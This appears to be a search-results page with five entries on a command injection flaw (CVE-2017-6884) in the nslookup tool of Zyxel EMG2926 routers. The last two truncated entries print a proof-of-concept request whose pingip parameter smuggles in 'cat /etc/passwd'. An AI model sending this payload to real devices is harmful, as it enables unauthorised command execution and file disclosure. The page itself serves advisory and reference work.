5 matches found
Zyxel EMG2926 Routers Command Injection Vulnerability
Zyxel EMG2926 routers contain a command injection vulnerability located in the diagnostic tools, specifically the nslookup function. A malicious user may exploit numerous vectors to execute malicious commands on the router, such as the pingip parameter to the expert/maintenance/diagnostic/nslooku...
Zyxel EMG2926 Router OS Command Injection (CVE-2017-6884)
A command injection vulnerability exists in Zyxel EMG2926. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the router...
CVE-2017-6884
The CVE-2017-6884 issue affects Zyxel EMG2926 routers (firmware around V1.00(AAQT.4)b8). The vulnerability is a command injection in the nslookup diagnostic tool that an authenticated, remote attacker can exploit via crafted HTTP requests (e.g., manipulating the ping_ip parameter in expert/mainte...
Zyxel_ EMG2926 V1.00(AAQT.4)b8 - OS Command Injection
Zyxel EMG2926 V1.00AAQT.4b8 - OS Command Injection Exploit Title: Zyxel, EMG2926 /expert/maintenance/diagnostic/nslookup?nslookupbutton=nslookupbutton&pingip=google.ca%3b%20cat%20/etc/passwd&serverip= HTTP/1.1 Host: 192.168.0.1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 Macintosh; Intel...
Zyxel, EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection
Exploit Title: Zyxel, EMG2926 /expert/maintenance/diagnostic/nslookup?nslookupbutton=nslookupbutton&pingip=google.ca%3b%20cat%20/etc/passwd&serverip= HTTP/1.1 Host: 192.168.0.1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 Macintosh; Intel Mac OS X 10124 AppleWebKit/537.36 KHTML, like Geck...